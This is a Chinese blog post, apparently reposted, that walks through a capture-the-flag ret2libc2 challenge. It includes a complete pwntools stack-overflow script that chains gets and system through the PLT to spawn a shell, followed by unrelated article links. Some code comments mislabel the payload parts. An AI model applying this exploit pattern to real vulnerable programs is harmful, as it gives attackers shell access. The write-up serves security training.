博客
关于我
ret2libc2
阅读量:551 次
发布时间:2019-03-09

本文共 916 字,大约阅读时间需要 3 分钟。

ret2libc2 问题的解决方法可以分为以下步骤:

  • 分析目标:目标是通过利用栈溢出攻击,在程序中执行 /bin/sh。

  • 理解PLT 表:利用PLT表中的 _system 函数进行层级跳转,确保函数返回到正确的位置以避免无限循环。

  • 构造栈溢出攻击:通过构造一个栈溢出 payload,利用已知的函数返回地址和参数位置,确保控制权返回到 system 并传递正确的参数 /bin/sh。

  • 利用 _system 函数:确保在 system 函数的参数中传递一个指向 sh 的指针,从而触发其执行。

  • 以下是实现该攻击的具体 payload 构造步骤:

    from pwn import *# 定义变量bss_addr = 0x0804A080gets_plt = 0x08048460sys_plt = 0x08048490pop_ret = 0x0804843d# 初始化过程io = process('./ret2libc2')io.recvuntil('What do you think ?')# 构造 payloadpayload = b'A' * 112payload += p32(gets_plt)         # 调用 gets 函数payload += p32(pop_ret)         # 跳转到返回点payload += p32(bss_addr)        # 调用 bss 段的地址payload += p32(sys_plt)         # 调用 _system 函数payload += b'aaaa'              # 显存填充payload += p32(bss_addr)         # 再次调用 bss 段的地址# 发送 payloadio.sendline(payload)io.sendline(b'/bin/sh')io.interactive()
    1. 测试和验证:使用工具如 gdb 进行调试,验证攻击是否成功,确保程序流程如预期执行,且没有遗漏或错误。
    2. 通过以上方法,可以有效地将控制权转移到 system 函数,并执行所需的代码片段,从而完成攻击目标。

    转载地址:http://yjzsz.baihongyu.com/

    你可能感兴趣的文章
    python 之栈的实现
    查看>>
    python语音播放
    查看>>
    python语言:装饰器原理
    查看>>
    Python 交互式数据可视化详解
    查看>>
    python语言有哪些优点和缺点_Python有哪些优缺点,你了解吗?
    查看>>
    Python 从入门到精通:30天速成教程到底有多狠?你能坚持下来吗?
    查看>>
    Python 从数据库中存储和检索密码的最安全方法
    查看>>
    Python语言及其应用 - 知识点遍历
    查看>>
    Python 优化提速的 8 个小技巧
    查看>>
    Python 余弦相似度与皮尔逊相关系数 计算
    查看>>
    python 使用execjs 报编码错误解决办法,UnicodeDecodeError: ‘gbk‘ codec can‘t decode byte 0xac in position 145: il
    查看>>
    python 使用filetype校验文件
    查看>>
    Python 使用flush函数将缓冲区数据立即写磁盘
    查看>>
    python 使用in判断不准确,in不好使
    查看>>
    Python 使用pandas 进行查询和统计详解
    查看>>
    Redis 配置文件redis.conf详细解释
    查看>>
    python网络爬虫(2)——scrapy框架的基础使用
    查看>>
    python网络爬虫实例教程试读_Python网络爬虫实战教程(全套完整版) - 学途无忧网 - 做技术的王者 - Powered By EduSoho...
    查看>>
    Python 使用哈希函数用于加密
    查看>>
    Python 依赖管理的革新——Poetry 深度解析
    查看>>